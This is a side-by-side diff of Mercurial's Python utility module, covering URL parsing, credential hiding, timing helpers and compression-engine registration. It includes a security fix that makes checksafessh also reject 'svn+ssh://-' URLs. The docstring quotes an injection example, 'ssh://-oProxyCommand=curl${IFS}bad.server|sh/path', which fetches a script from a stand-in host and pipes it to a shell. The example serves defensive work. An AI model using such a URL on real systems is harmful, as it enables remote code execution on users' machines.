2674 parts = path.split(':', 1)
2675 if parts[0]:
2675 if parts[0]:
2676 self.scheme, path = parts
2676 self.scheme, path = parts
2677 self._localpath = False
2677 self._localpath = False
2678
2678
2679 if not path:
2679 if not path:
2680 path = None
2680 path = None
2681 if self._localpath:
2681 if self._localpath:
2682 self.path = ''
2682 self.path = ''
2683 return
2683 return
2684 else:
2684 else:
2685 if self._localpath:
2685 if self._localpath:
2686 self.path = path
2686 self.path = path
2687 return
2687 return
2688
2688
2689 if parsequery and '?' in path:
2689 if parsequery and '?' in path:
2690 path, self.query = path.split('?', 1)
2690 path, self.query = path.split('?', 1)
2691 if not path:
2691 if not path:
2692 path = None
2692 path = None
2693 if not self.query:
2693 if not self.query:
2694 self.query = None
2694 self.query = None
2695
2695
2696 # // is required to specify a host/authority
2696 # // is required to specify a host/authority
2697 if path and path.startswith('//'):
2697 if path and path.startswith('//'):
2698 parts = path[2:].split('/', 1)
2698 parts = path[2:].split('/', 1)
2699 if len(parts) > 1:
2699 if len(parts) > 1:
2700 self.host, path = parts
2700 self.host, path = parts
2701 else:
2701 else:
2702 self.host = parts[0]
2702 self.host = parts[0]
2703 path = None
2703 path = None
2704 if not self.host:
2704 if not self.host:
2705 self.host = None
2705 self.host = None
2706 # path of file:///d is /d
2706 # path of file:///d is /d
2707 # path of file:///d:/ is d:/, not /d:/
2707 # path of file:///d:/ is d:/, not /d:/
2708 if path and not hasdriveletter(path):
2708 if path and not hasdriveletter(path):
2709 path = '/' + path
2709 path = '/' + path
2710
2710
2711 if self.host and '@' in self.host:
2711 if self.host and '@' in self.host:
2712 self.user, self.host = self.host.rsplit('@', 1)
2712 self.user, self.host = self.host.rsplit('@', 1)
2713 if ':' in self.user:
2713 if ':' in self.user:
2714 self.user, self.passwd = self.user.split(':', 1)
2714 self.user, self.passwd = self.user.split(':', 1)
2715 if not self.host:
2715 if not self.host:
2716 self.host = None
2716 self.host = None
2717
2717
2718 # Don't split on colons in IPv6 addresses without ports
2718 # Don't split on colons in IPv6 addresses without ports
2719 if (self.host and ':' in self.host and
2719 if (self.host and ':' in self.host and
2720 not (self.host.startswith('[') and self.host.endswith(']'))):
2720 not (self.host.startswith('[') and self.host.endswith(']'))):
2721 self._hostport = self.host
2721 self._hostport = self.host
2722 self.host, self.port = self.host.rsplit(':', 1)
2722 self.host, self.port = self.host.rsplit(':', 1)
2723 if not self.host:
2723 if not self.host:
2724 self.host = None
2724 self.host = None
2725
2725
2726 if (self.host and self.scheme == 'file' and
2726 if (self.host and self.scheme == 'file' and
2727 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2727 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2728 raise Abort(_('file:// URLs can only refer to localhost'))
2728 raise Abort(_('file:// URLs can only refer to localhost'))
2729
2729
2730 self.path = path
2730 self.path = path
2731
2731
2732 # leave the query string escaped
2732 # leave the query string escaped
2733 for a in ('user', 'passwd', 'host', 'port',
2733 for a in ('user', 'passwd', 'host', 'port',
2734 'path', 'fragment'):
2734 'path', 'fragment'):
2735 v = getattr(self, a)
2735 v = getattr(self, a)
2736 if v is not None:
2736 if v is not None:
2737 setattr(self, a, urlreq.unquote(v))
2737 setattr(self, a, urlreq.unquote(v))
2738
2738
2739 def __repr__(self):
2739 def __repr__(self):
2740 attrs = []
2740 attrs = []
2741 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2741 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2742 'query', 'fragment'):
2742 'query', 'fragment'):
2743 v = getattr(self, a)
2743 v = getattr(self, a)
2744 if v is not None:
2744 if v is not None:
2745 attrs.append('%s: %r' % (a, v))
2745 attrs.append('%s: %r' % (a, v))
2746 return '<url %s>' % ', '.join(attrs)
2746 return '<url %s>' % ', '.join(attrs)
2747
2747
2748 def __str__(self):
2748 def __str__(self):
2749 r"""Join the URL's components back into a URL string.
2749 r"""Join the URL's components back into a URL string.
2750
2750
2751 Examples:
2751 Examples:
2752
2752
2753 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2753 >>> str(url('http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2754 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2754 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2755 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2755 >>> str(url('http://user:pw@host:80/?foo=bar&baz=42'))
2756 'http://user:pw@host:80/?foo=bar&baz=42'
2756 'http://user:pw@host:80/?foo=bar&baz=42'
2757 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2757 >>> str(url('http://user:pw@host:80/?foo=bar%3dbaz'))
2758 'http://user:pw@host:80/?foo=bar%3dbaz'
2758 'http://user:pw@host:80/?foo=bar%3dbaz'
2759 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2759 >>> str(url('ssh://user:pw@[::1]:2200//home/joe#'))
2760 'ssh://user:pw@[::1]:2200//home/joe#'
2760 'ssh://user:pw@[::1]:2200//home/joe#'
2761 >>> str(url('http://localhost:80//'))
2761 >>> str(url('http://localhost:80//'))
2762 'http://localhost:80//'
2762 'http://localhost:80//'
2763 >>> str(url('http://localhost:80/'))
2763 >>> str(url('http://localhost:80/'))
2764 'http://localhost:80/'
2764 'http://localhost:80/'
2765 >>> str(url('http://localhost:80'))
2765 >>> str(url('http://localhost:80'))
2766 'http://localhost:80/'
2766 'http://localhost:80/'
2767 >>> str(url('bundle:foo'))
2767 >>> str(url('bundle:foo'))
2768 'bundle:foo'
2768 'bundle:foo'
2769 >>> str(url('bundle://../foo'))
2769 >>> str(url('bundle://../foo'))
2770 'bundle:../foo'
2770 'bundle:../foo'
2771 >>> str(url('path'))
2771 >>> str(url('path'))
2772 'path'
2772 'path'
2773 >>> str(url('file:///tmp/foo/bar'))
2773 >>> str(url('file:///tmp/foo/bar'))
2774 'file:///tmp/foo/bar'
2774 'file:///tmp/foo/bar'
2775 >>> str(url('file:///c:/tmp/foo/bar'))
2775 >>> str(url('file:///c:/tmp/foo/bar'))
2776 'file:///c:/tmp/foo/bar'
2776 'file:///c:/tmp/foo/bar'
2777 >>> print url(r'bundle:foo\bar')
2777 >>> print url(r'bundle:foo\bar')
2778 bundle:foo\bar
2778 bundle:foo\bar
2779 >>> print url(r'file:///D:\data\hg')
2779 >>> print url(r'file:///D:\data\hg')
2780 file:///D:\data\hg
2780 file:///D:\data\hg
2781 """
2781 """
2782 return encoding.strfromlocal(self.__bytes__())
2782 return encoding.strfromlocal(self.__bytes__())
2783
2783
2784 def __bytes__(self):
2784 def __bytes__(self):
2785 if self._localpath:
2785 if self._localpath:
2786 s = self.path
2786 s = self.path
2787 if self.scheme == 'bundle':
2787 if self.scheme == 'bundle':
2788 s = 'bundle:' + s
2788 s = 'bundle:' + s
2789 if self.fragment:
2789 if self.fragment:
2790 s += '#' + self.fragment
2790 s += '#' + self.fragment
2791 return s
2791 return s
2792
2792
2793 s = self.scheme + ':'
2793 s = self.scheme + ':'
2794 if self.user or self.passwd or self.host:
2794 if self.user or self.passwd or self.host:
2795 s += '//'
2795 s += '//'
2796 elif self.scheme and (not self.path or self.path.startswith('/')
2796 elif self.scheme and (not self.path or self.path.startswith('/')
2797 or hasdriveletter(self.path)):
2797 or hasdriveletter(self.path)):
2798 s += '//'
2798 s += '//'
2799 if hasdriveletter(self.path):
2799 if hasdriveletter(self.path):
2800 s += '/'
2800 s += '/'
2801 if self.user:
2801 if self.user:
2802 s += urlreq.quote(self.user, safe=self._safechars)
2802 s += urlreq.quote(self.user, safe=self._safechars)
2803 if self.passwd:
2803 if self.passwd:
2804 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2804 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2805 if self.user or self.passwd:
2805 if self.user or self.passwd:
2806 s += '@'
2806 s += '@'
2807 if self.host:
2807 if self.host:
2808 if not (self.host.startswith('[') and self.host.endswith(']')):
2808 if not (self.host.startswith('[') and self.host.endswith(']')):
2809 s += urlreq.quote(self.host)
2809 s += urlreq.quote(self.host)
2810 else:
2810 else:
2811 s += self.host
2811 s += self.host
2812 if self.port:
2812 if self.port:
2813 s += ':' + urlreq.quote(self.port)
2813 s += ':' + urlreq.quote(self.port)
2814 if self.host:
2814 if self.host:
2815 s += '/'
2815 s += '/'
2816 if self.path:
2816 if self.path:
2817 # TODO: similar to the query string, we should not unescape the
2817 # TODO: similar to the query string, we should not unescape the
2818 # path when we store it, the path might contain '%2f' = '/',
2818 # path when we store it, the path might contain '%2f' = '/',
2819 # which we should *not* escape.
2819 # which we should *not* escape.
2820 s += urlreq.quote(self.path, safe=self._safepchars)
2820 s += urlreq.quote(self.path, safe=self._safepchars)
2821 if self.query:
2821 if self.query:
2822 # we store the query in escaped form.
2822 # we store the query in escaped form.
2823 s += '?' + self.query
2823 s += '?' + self.query
2824 if self.fragment is not None:
2824 if self.fragment is not None:
2825 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2825 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2826 return s
2826 return s
2827
2827
2828 def authinfo(self):
2828 def authinfo(self):
2829 user, passwd = self.user, self.passwd
2829 user, passwd = self.user, self.passwd
2830 try:
2830 try:
2831 self.user, self.passwd = None, None
2831 self.user, self.passwd = None, None
2832 s = bytes(self)
2832 s = bytes(self)
2833 finally:
2833 finally:
2834 self.user, self.passwd = user, passwd
2834 self.user, self.passwd = user, passwd
2835 if not self.user:
2835 if not self.user:
2836 return (s, None)
2836 return (s, None)
2837 # authinfo[1] is passed to urllib2 password manager, and its
2837 # authinfo[1] is passed to urllib2 password manager, and its
2838 # URIs must not contain credentials. The host is passed in the
2838 # URIs must not contain credentials. The host is passed in the
2839 # URIs list because Python < 2.4.3 uses only that to search for
2839 # URIs list because Python < 2.4.3 uses only that to search for
2840 # a password.
2840 # a password.
2841 return (s, (None, (s, self.host),
2841 return (s, (None, (s, self.host),
2842 self.user, self.passwd or ''))
2842 self.user, self.passwd or ''))
2843
2843
2844 def isabs(self):
2844 def isabs(self):
2845 if self.scheme and self.scheme != 'file':
2845 if self.scheme and self.scheme != 'file':
2846 return True # remote URL
2846 return True # remote URL
2847 if hasdriveletter(self.path):
2847 if hasdriveletter(self.path):
2848 return True # absolute for our purposes - can't be joined()
2848 return True # absolute for our purposes - can't be joined()
2849 if self.path.startswith(r'\\'):
2849 if self.path.startswith(r'\\'):
2850 return True # Windows UNC path
2850 return True # Windows UNC path
2851 if self.path.startswith('/'):
2851 if self.path.startswith('/'):
2852 return True # POSIX-style
2852 return True # POSIX-style
2853 return False
2853 return False
2854
2854
2855 def localpath(self):
2855 def localpath(self):
2856 if self.scheme == 'file' or self.scheme == 'bundle':
2856 if self.scheme == 'file' or self.scheme == 'bundle':
2857 path = self.path or '/'
2857 path = self.path or '/'
2858 # For Windows, we need to promote hosts containing drive
2858 # For Windows, we need to promote hosts containing drive
2859 # letters to paths with drive letters.
2859 # letters to paths with drive letters.
2860 if hasdriveletter(self._hostport):
2860 if hasdriveletter(self._hostport):
2861 path = self._hostport + '/' + self.path
2861 path = self._hostport + '/' + self.path
2862 elif (self.host is not None and self.path
2862 elif (self.host is not None and self.path
2863 and not hasdriveletter(path)):
2863 and not hasdriveletter(path)):
2864 path = '/' + path
2864 path = '/' + path
2865 return path
2865 return path
2866 return self._origpath
2866 return self._origpath
2867
2867
2868 def islocal(self):
2868 def islocal(self):
2869 '''whether localpath will return something that posixfile can open'''
2869 '''whether localpath will return something that posixfile can open'''
2870 return (not self.scheme or self.scheme == 'file'
2870 return (not self.scheme or self.scheme == 'file'
2871 or self.scheme == 'bundle')
2871 or self.scheme == 'bundle')
2872
2872
2873 def hasscheme(path):
2873 def hasscheme(path):
2874 return bool(url(path).scheme)
2874 return bool(url(path).scheme)
2875
2875
2876 def hasdriveletter(path):
2876 def hasdriveletter(path):
2877 return path and path[1:2] == ':' and path[0:1].isalpha()
2877 return path and path[1:2] == ':' and path[0:1].isalpha()
2878
2878
2879 def urllocalpath(path):
2879 def urllocalpath(path):
2880 return url(path, parsequery=False, parsefragment=False).localpath()
2880 return url(path, parsequery=False, parsefragment=False).localpath()
2881
2881
2882 def checksafessh(path):
2882 def checksafessh(path):
2883 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2883 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2884
2884
2885 This is a sanity check for ssh urls. ssh will parse the first item as
2885 This is a sanity check for ssh urls. ssh will parse the first item as
2886 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2886 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2887 Let's prevent these potentially exploited urls entirely and warn the
2887 Let's prevent these potentially exploited urls entirely and warn the
2888 user.
2888 user.
2889
2889
2890 Raises an error.Abort when the url is unsafe.
2890 Raises an error.Abort when the url is unsafe.
2891 """
2891 """
2892 path = urlreq.unquote(path)
2892 path = urlreq.unquote(path)
2893 if path.startswith('ssh://-') or '|' in path:
2893 if (path.startswith('ssh://-') or path.startswith('svn+ssh://-')
2894 or '|' in path):
2894 raise error.Abort(_('potentially unsafe url: %r') %
2895 raise error.Abort(_('potentially unsafe url: %r') %
2895 (path,))
2896 (path,))
2896
2897
2897 def hidepassword(u):
2898 def hidepassword(u):
2898 '''hide user credential in a url string'''
2899 '''hide user credential in a url string'''
2899 u = url(u)
2900 u = url(u)
2900 if u.passwd:
2901 if u.passwd:
2901 u.passwd = '***'
2902 u.passwd = '***'
2902 return bytes(u)
2903 return bytes(u)
2903
2904
2904 def removeauth(u):
2905 def removeauth(u):
2905 '''remove all authentication information from a url string'''
2906 '''remove all authentication information from a url string'''
2906 u = url(u)
2907 u = url(u)
2907 u.user = u.passwd = None
2908 u.user = u.passwd = None
2908 return str(u)
2909 return str(u)
2909
2910
2910 timecount = unitcountfn(
2911 timecount = unitcountfn(
2911 (1, 1e3, _('%.0f s')),
2912 (1, 1e3, _('%.0f s')),
2912 (100, 1, _('%.1f s')),
2913 (100, 1, _('%.1f s')),
2913 (10, 1, _('%.2f s')),
2914 (10, 1, _('%.2f s')),
2914 (1, 1, _('%.3f s')),
2915 (1, 1, _('%.3f s')),
2915 (100, 0.001, _('%.1f ms')),
2916 (100, 0.001, _('%.1f ms')),
2916 (10, 0.001, _('%.2f ms')),
2917 (10, 0.001, _('%.2f ms')),
2917 (1, 0.001, _('%.3f ms')),
2918 (1, 0.001, _('%.3f ms')),
2918 (100, 0.000001, _('%.1f us')),
2919 (100, 0.000001, _('%.1f us')),
2919 (10, 0.000001, _('%.2f us')),
2920 (10, 0.000001, _('%.2f us')),
2920 (1, 0.000001, _('%.3f us')),
2921 (1, 0.000001, _('%.3f us')),
2921 (100, 0.000000001, _('%.1f ns')),
2922 (100, 0.000000001, _('%.1f ns')),
2922 (10, 0.000000001, _('%.2f ns')),
2923 (10, 0.000000001, _('%.2f ns')),
2923 (1, 0.000000001, _('%.3f ns')),
2924 (1, 0.000000001, _('%.3f ns')),
2924 )
2925 )
2925
2926
2926 _timenesting = [0]
2927 _timenesting = [0]
2927
2928
2928 def timed(func):
2929 def timed(func):
2929 '''Report the execution time of a function call to stderr.
2930 '''Report the execution time of a function call to stderr.
2930
2931
2931 During development, use as a decorator when you need to measure
2932 During development, use as a decorator when you need to measure
2932 the cost of a function, e.g. as follows:
2933 the cost of a function, e.g. as follows:
2933
2934
2934 @util.timed
2935 @util.timed
2935 def foo(a, b, c):
2936 def foo(a, b, c):
2936 pass
2937 pass
2937 '''
2938 '''
2938
2939
2939 def wrapper(*args, **kwargs):
2940 def wrapper(*args, **kwargs):
2940 start = timer()
2941 start = timer()
2941 indent = 2
2942 indent = 2
2942 _timenesting[0] += indent
2943 _timenesting[0] += indent
2943 try:
2944 try:
2944 return func(*args, **kwargs)
2945 return func(*args, **kwargs)
2945 finally:
2946 finally:
2946 elapsed = timer() - start
2947 elapsed = timer() - start
2947 _timenesting[0] -= indent
2948 _timenesting[0] -= indent
2948 stderr.write('%s%s: %s\n' %
2949 stderr.write('%s%s: %s\n' %
2949 (' ' * _timenesting[0], func.__name__,
2950 (' ' * _timenesting[0], func.__name__,
2950 timecount(elapsed)))
2951 timecount(elapsed)))
2951 return wrapper
2952 return wrapper
2952
2953
2953 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2954 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2954 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2955 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2955
2956
2956 def sizetoint(s):
2957 def sizetoint(s):
2957 '''Convert a space specifier to a byte count.
2958 '''Convert a space specifier to a byte count.
2958
2959
2959 >>> sizetoint('30')
2960 >>> sizetoint('30')
2960 30
2961 30
2961 >>> sizetoint('2.2kb')
2962 >>> sizetoint('2.2kb')
2962 2252
2963 2252
2963 >>> sizetoint('6M')
2964 >>> sizetoint('6M')
2964 6291456
2965 6291456
2965 '''
2966 '''
2966 t = s.strip().lower()
2967 t = s.strip().lower()
2967 try:
2968 try:
2968 for k, u in _sizeunits:
2969 for k, u in _sizeunits:
2969 if t.endswith(k):
2970 if t.endswith(k):
2970 return int(float(t[:-len(k)]) * u)
2971 return int(float(t[:-len(k)]) * u)
2971 return int(t)
2972 return int(t)
2972 except ValueError:
2973 except ValueError:
2973 raise error.ParseError(_("couldn't parse size: %s") % s)
2974 raise error.ParseError(_("couldn't parse size: %s") % s)
2974
2975
2975 class hooks(object):
2976 class hooks(object):
2976 '''A collection of hook functions that can be used to extend a
2977 '''A collection of hook functions that can be used to extend a
2977 function's behavior. Hooks are called in lexicographic order,
2978 function's behavior. Hooks are called in lexicographic order,
2978 based on the names of their sources.'''
2979 based on the names of their sources.'''
2979
2980
2980 def __init__(self):
2981 def __init__(self):
2981 self._hooks = []
2982 self._hooks = []
2982
2983
2983 def add(self, source, hook):
2984 def add(self, source, hook):
2984 self._hooks.append((source, hook))
2985 self._hooks.append((source, hook))
2985
2986
2986 def __call__(self, *args):
2987 def __call__(self, *args):
2987 self._hooks.sort(key=lambda x: x[0])
2988 self._hooks.sort(key=lambda x: x[0])
2988 results = []
2989 results = []
2989 for source, hook in self._hooks:
2990 for source, hook in self._hooks:
2990 results.append(hook(*args))
2991 results.append(hook(*args))
2991 return results
2992 return results
2992
2993
2993 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
2994 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
2994 '''Yields lines for a nicely formatted stacktrace.
2995 '''Yields lines for a nicely formatted stacktrace.
2995 Skips the 'skip' last entries, then return the last 'depth' entries.
2996 Skips the 'skip' last entries, then return the last 'depth' entries.
2996 Each file+linenumber is formatted according to fileline.
2997 Each file+linenumber is formatted according to fileline.
2997 Each line is formatted according to line.
2998 Each line is formatted according to line.
2998 If line is None, it yields:
2999 If line is None, it yields:
2999 length of longest filepath+line number,
3000 length of longest filepath+line number,
3000 filepath+linenumber,
3001 filepath+linenumber,
3001 function
3002 function
3002
3003
3003 Not be used in production code but very convenient while developing.
3004 Not be used in production code but very convenient while developing.
3004 '''
3005 '''
3005 entries = [(fileline % (fn, ln), func)
3006 entries = [(fileline % (fn, ln), func)
3006 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3007 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3007 ][-depth:]
3008 ][-depth:]
3008 if entries:
3009 if entries:
3009 fnmax = max(len(entry[0]) for entry in entries)
3010 fnmax = max(len(entry[0]) for entry in entries)
3010 for fnln, func in entries:
3011 for fnln, func in entries:
3011 if line is None:
3012 if line is None:
3012 yield (fnmax, fnln, func)
3013 yield (fnmax, fnln, func)
3013 else:
3014 else:
3014 yield line % (fnmax, fnln, func)
3015 yield line % (fnmax, fnln, func)
3015
3016
3016 def debugstacktrace(msg='stacktrace', skip=0,
3017 def debugstacktrace(msg='stacktrace', skip=0,
3017 f=stderr, otherf=stdout, depth=0):
3018 f=stderr, otherf=stdout, depth=0):
3018 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3019 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3019 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3020 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3020 By default it will flush stdout first.
3021 By default it will flush stdout first.
3021 It can be used everywhere and intentionally does not require an ui object.
3022 It can be used everywhere and intentionally does not require an ui object.
3022 Not be used in production code but very convenient while developing.
3023 Not be used in production code but very convenient while developing.
3023 '''
3024 '''
3024 if otherf:
3025 if otherf:
3025 otherf.flush()
3026 otherf.flush()
3026 f.write('%s at:\n' % msg.rstrip())
3027 f.write('%s at:\n' % msg.rstrip())
3027 for line in getstackframes(skip + 1, depth=depth):
3028 for line in getstackframes(skip + 1, depth=depth):
3028 f.write(line)
3029 f.write(line)
3029 f.flush()
3030 f.flush()
3030
3031
3031 class dirs(object):
3032 class dirs(object):
3032 '''a multiset of directory names from a dirstate or manifest'''
3033 '''a multiset of directory names from a dirstate or manifest'''
3033
3034
3034 def __init__(self, map, skip=None):
3035 def __init__(self, map, skip=None):
3035 self._dirs = {}
3036 self._dirs = {}
3036 addpath = self.addpath
3037 addpath = self.addpath
3037 if safehasattr(map, 'iteritems') and skip is not None:
3038 if safehasattr(map, 'iteritems') and skip is not None:
3038 for f, s in map.iteritems():
3039 for f, s in map.iteritems():
3039 if s[0] != skip:
3040 if s[0] != skip:
3040 addpath(f)
3041 addpath(f)
3041 else:
3042 else:
3042 for f in map:
3043 for f in map:
3043 addpath(f)
3044 addpath(f)
3044
3045
3045 def addpath(self, path):
3046 def addpath(self, path):
3046 dirs = self._dirs
3047 dirs = self._dirs
3047 for base in finddirs(path):
3048 for base in finddirs(path):
3048 if base in dirs:
3049 if base in dirs:
3049 dirs[base] += 1
3050 dirs[base] += 1
3050 return
3051 return
3051 dirs[base] = 1
3052 dirs[base] = 1
3052
3053
3053 def delpath(self, path):
3054 def delpath(self, path):
3054 dirs = self._dirs
3055 dirs = self._dirs
3055 for base in finddirs(path):
3056 for base in finddirs(path):
3056 if dirs[base] > 1:
3057 if dirs[base] > 1:
3057 dirs[base] -= 1
3058 dirs[base] -= 1
3058 return
3059 return
3059 del dirs[base]
3060 del dirs[base]
3060
3061
3061 def __iter__(self):
3062 def __iter__(self):
3062 return iter(self._dirs)
3063 return iter(self._dirs)
3063
3064
3064 def __contains__(self, d):
3065 def __contains__(self, d):
3065 return d in self._dirs
3066 return d in self._dirs
3066
3067
3067 if safehasattr(parsers, 'dirs'):
3068 if safehasattr(parsers, 'dirs'):
3068 dirs = parsers.dirs
3069 dirs = parsers.dirs
3069
3070
3070 def finddirs(path):
3071 def finddirs(path):
3071 pos = path.rfind('/')
3072 pos = path.rfind('/')
3072 while pos != -1:
3073 while pos != -1:
3073 yield path[:pos]
3074 yield path[:pos]
3074 pos = path.rfind('/', 0, pos)
3075 pos = path.rfind('/', 0, pos)
3075
3076
3076 class ctxmanager(object):
3077 class ctxmanager(object):
3077 '''A context manager for use in 'with' blocks to allow multiple
3078 '''A context manager for use in 'with' blocks to allow multiple
3078 contexts to be entered at once. This is both safer and more
3079 contexts to be entered at once. This is both safer and more
3079 flexible than contextlib.nested.
3080 flexible than contextlib.nested.
3080
3081
3081 Once Mercurial supports Python 2.7+, this will become mostly
3082 Once Mercurial supports Python 2.7+, this will become mostly
3082 unnecessary.
3083 unnecessary.
3083 '''
3084 '''
3084
3085
3085 def __init__(self, *args):
3086 def __init__(self, *args):
3086 '''Accepts a list of no-argument functions that return context
3087 '''Accepts a list of no-argument functions that return context
3087 managers. These will be invoked at __call__ time.'''
3088 managers. These will be invoked at __call__ time.'''
3088 self._pending = args
3089 self._pending = args
3089 self._atexit = []
3090 self._atexit = []
3090
3091
3091 def __enter__(self):
3092 def __enter__(self):
3092 return self
3093 return self
3093
3094
3094 def enter(self):
3095 def enter(self):
3095 '''Create and enter context managers in the order in which they were
3096 '''Create and enter context managers in the order in which they were
3096 passed to the constructor.'''
3097 passed to the constructor.'''
3097 values = []
3098 values = []
3098 for func in self._pending:
3099 for func in self._pending:
3099 obj = func()
3100 obj = func()
3100 values.append(obj.__enter__())
3101 values.append(obj.__enter__())
3101 self._atexit.append(obj.__exit__)
3102 self._atexit.append(obj.__exit__)
3102 del self._pending
3103 del self._pending
3103 return values
3104 return values
3104
3105
3105 def atexit(self, func, *args, **kwargs):
3106 def atexit(self, func, *args, **kwargs):
3106 '''Add a function to call when this context manager exits. The
3107 '''Add a function to call when this context manager exits. The
3107 ordering of multiple atexit calls is unspecified, save that
3108 ordering of multiple atexit calls is unspecified, save that
3108 they will happen before any __exit__ functions.'''
3109 they will happen before any __exit__ functions.'''
3109 def wrapper(exc_type, exc_val, exc_tb):
3110 def wrapper(exc_type, exc_val, exc_tb):
3110 func(*args, **kwargs)
3111 func(*args, **kwargs)
3111 self._atexit.append(wrapper)
3112 self._atexit.append(wrapper)
3112 return func
3113 return func
3113
3114
3114 def __exit__(self, exc_type, exc_val, exc_tb):
3115 def __exit__(self, exc_type, exc_val, exc_tb):
3115 '''Context managers are exited in the reverse order from which
3116 '''Context managers are exited in the reverse order from which
3116 they were created.'''
3117 they were created.'''
3117 received = exc_type is not None
3118 received = exc_type is not None
3118 suppressed = False
3119 suppressed = False
3119 pending = None
3120 pending = None
3120 self._atexit.reverse()
3121 self._atexit.reverse()
3121 for exitfunc in self._atexit:
3122 for exitfunc in self._atexit:
3122 try:
3123 try:
3123 if exitfunc(exc_type, exc_val, exc_tb):
3124 if exitfunc(exc_type, exc_val, exc_tb):
3124 suppressed = True
3125 suppressed = True
3125 exc_type = None
3126 exc_type = None
3126 exc_val = None
3127 exc_val = None
3127 exc_tb = None
3128 exc_tb = None
3128 except BaseException:
3129 except BaseException:
3129 pending = sys.exc_info()
3130 pending = sys.exc_info()
3130 exc_type, exc_val, exc_tb = pending = sys.exc_info()
3131 exc_type, exc_val, exc_tb = pending = sys.exc_info()
3131 del self._atexit
3132 del self._atexit
3132 if pending:
3133 if pending:
3133 raise exc_val
3134 raise exc_val
3134 return received and suppressed
3135 return received and suppressed
3135
3136
3136 # compression code
3137 # compression code
3137
3138
3138 SERVERROLE = 'server'
3139 SERVERROLE = 'server'
3139 CLIENTROLE = 'client'
3140 CLIENTROLE = 'client'
3140
3141
3141 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3142 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3142 (u'name', u'serverpriority',
3143 (u'name', u'serverpriority',
3143 u'clientpriority'))
3144 u'clientpriority'))
3144
3145
3145 class compressormanager(object):
3146 class compressormanager(object):
3146 """Holds registrations of various compression engines.
3147 """Holds registrations of various compression engines.
3147
3148
3148 This class essentially abstracts the differences between compression
3149 This class essentially abstracts the differences between compression
3149 engines to allow new compression formats to be added easily, possibly from
3150 engines to allow new compression formats to be added easily, possibly from
3150 extensions.
3151 extensions.
3151
3152
3152 Compressors are registered against the global instance by calling its
3153 Compressors are registered against the global instance by calling its
3153 ``register()`` method.
3154 ``register()`` method.
3154 """
3155 """
3155 def __init__(self):
3156 def __init__(self):
3156 self._engines = {}
3157 self._engines = {}
3157 # Bundle spec human name to engine name.
3158 # Bundle spec human name to engine name.
3158 self._bundlenames = {}
3159 self._bundlenames = {}
3159 # Internal bundle identifier to engine name.
3160 # Internal bundle identifier to engine name.
3160 self._bundletypes = {}
3161 self._bundletypes = {}
3161 # Revlog header to engine name.
3162 # Revlog header to engine name.
3162 self._revlogheaders = {}
3163 self._revlogheaders = {}
3163 # Wire proto identifier to engine name.
3164 # Wire proto identifier to engine name.
3164 self._wiretypes = {}
3165 self._wiretypes = {}
3165
3166
3166 def __getitem__(self, key):
3167 def __getitem__(self, key):
3167 return self._engines[key]
3168 return self._engines[key]
3168
3169
3169 def __contains__(self, key):
3170 def __contains__(self, key):
3170 return key in self._engines
3171 return key in self._engines
3171
3172
3172 def __iter__(self):
3173 def __iter__(self):
3173 return iter(self._engines.keys())
3174 return iter(self._engines.keys())
3174
3175
3175 def register(self, engine):
3176 def register(self, engine):
3176 """Register a compression engine with the manager.
3177 """Register a compression engine with the manager.
3177
3178
3178 The argument must be a ``compressionengine`` instance.
3179 The argument must be a ``compressionengine`` instance.
3179 """
3180 """
3180 if not isinstance(engine, compressionengine):
3181 if not isinstance(engine, compressionengine):
3181 raise ValueError(_('argument must be a compressionengine'))
3182 raise ValueError(_('argument must be a compressionengine'))
3182
3183
3183 name = engine.name()
3184 name = engine.name()
3184
3185
3185 if name in self._engines:
3186 if name in self._engines:
3186 raise error.Abort(_('compression engine %s already registered') %
3187 raise error.Abort(_('compression engine %s already registered') %
3187 name)
3188 name)
3188
3189
3189 bundleinfo = engine.bundletype()
3190 bundleinfo = engine.bundletype()
3190 if bundleinfo:
3191 if bundleinfo:
3191 bundlename, bundletype = bundleinfo
3192 bundlename, bundletype = bundleinfo
3192
3193
3193 if bundlename in self._bundlenames:
3194 if bundlename in self._bundlenames:
3194 raise error.Abort(_('bundle name %s already registered') %
3195 raise error.Abort(_('bundle name %s already registered') %
3195 bundlename)
3196 bundlename)
3196 if bundletype in self._bundletypes:
3197 if bundletype in self._bundletypes:
3197 raise error.Abort(_('bundle type %s already registered by %s') %
3198 raise error.Abort(_('bundle type %s already registered by %s') %
3198 (bundletype, self._bundletypes[bundletype]))
3199 (bundletype, self._bundletypes[bundletype]))
3199
3200
3200 # No external facing name declared.
3201 # No external facing name declared.
3201 if bundlename:
3202 if bundlename:
3202 self._bundlenames[bundlename] = name
3203 self._bundlenames[bundlename] = name
3203
3204
3204 self._bundletypes[bundletype] = name
